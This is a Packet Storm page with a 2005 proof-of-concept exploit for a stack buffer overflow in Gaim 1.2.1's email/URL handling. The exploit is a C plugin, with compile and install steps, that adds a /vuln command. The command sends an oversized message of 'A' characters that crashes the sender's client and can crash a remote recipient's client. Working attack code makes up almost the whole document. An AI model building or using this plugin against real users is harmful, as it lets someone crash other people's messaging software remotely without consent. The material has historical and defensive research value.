GAIM 1.2.x URL handling remote buffer overflow proof of concept exploit.
7848d3161cbdedd627a1264584866ef1ecae57e20a4c30b79437a3d05ca0bf88// Written by Ron <iago@valhallalegends.com>
// Friday, May 13, 2005
//
// This is a very weak demonstration of Gaim 1.2.1's stack overflow vulnerability
// when processing email addresses. What this basically does is segfault you when you
// do a /vuln command in a conversation, and, if you're using a protocol that allows
// a 10002-character message to go through, also segfaults the person you sent it to.
// The reason is that gaim's stack is overwritten with a whole bunch of 'A's, and
// the return address of the function ends up at 0x41414141. That's no good for
// anybody.
//
// This code should be considered public domain, and is freely modifiable/distributable
// by any and everyone.
//
// Note:
// To compile, place this in the "plugins" directory of Gaim's source
// (gaim-1.2.1/plugins) and type "make vuln-plugin.so". This will compile vuln-plugin.so.
// Then put it in ~/.gaim/plugins, restart gaim, and load it as a plugin.
#include <unistd.h>
#include <ctype.h>
#include <string.h>
#include <locale.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "internal.h"
#include "gtkgaim.h"
#include "debug.h"
#include "signals.h"
#include "util.h"
#include "version.h"
#include "cmds.h"
#include "conversation.h"
#include "gtkplugin.h"
#include "gtkutils.h"
#define ME "1.2.1 Vuln Check"
#define MAXLENGTH 1024
#define XMMS_PLUGIN_VERSION "I am a test plugin to check for
URL encoding vulnerability."
static GaimCmdId cmd;
char *code = "A@AAAA...(A*8192)...AAAAA";
gboolean go(GaimConversation *conv, const gchar *cmd, gchar **args,
gchar **error, void *data)
{
gaim_conv_im_send(GAIM_CONV_IM(conv), code);
return GAIM_CMD_STATUS_OK;
}
static gboolean plugin_load(GaimPlugin *plugin)
{
cmd = gaim_cmd_register("vuln", "", GAIM_CMD_P_DEFAULT,
GAIM_CMD_FLAG_IM, NULL, (GaimCmdFunc)go, "/vuln", NULL);
return TRUE;
}
static gboolean plugin_unload(GaimPlugin *plugin)
{
gaim_cmd_unregister (cmd);
return TRUE;
}
static GaimPluginInfo info =
{
GAIM_PLUGIN_MAGIC,
GAIM_MAJOR_VERSION,
GAIM_MINOR_VERSION,
GAIM_PLUGIN_STANDARD, /**< type */
NULL, /**< ui_requirement */
0, /**< flags */
NULL, /**< dependencies */
GAIM_PRIORITY_DEFAULT, /**< priority */
NULL, /**< id */
N_("1.2.1 Email Overflow Demo"), /**< name */
VERSION, /**< version */
/** summary */
N_(""),
/** description */
N_(""),
"Ron <iago@valhallalegends.com>", /**< author */
"", /**< homepage */
plugin_load, /**< load */
plugin_unload, /**< unload */
NULL, /**< destroy */
NULL, /**< ui_info */
NULL, /**< extra_info */
NULL,
NULL
};
static void init_plugin(GaimPlugin *plugin)
{
}
GAIM_INIT_PLUGIN(XMMSPlugin, init_plugin, info)
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed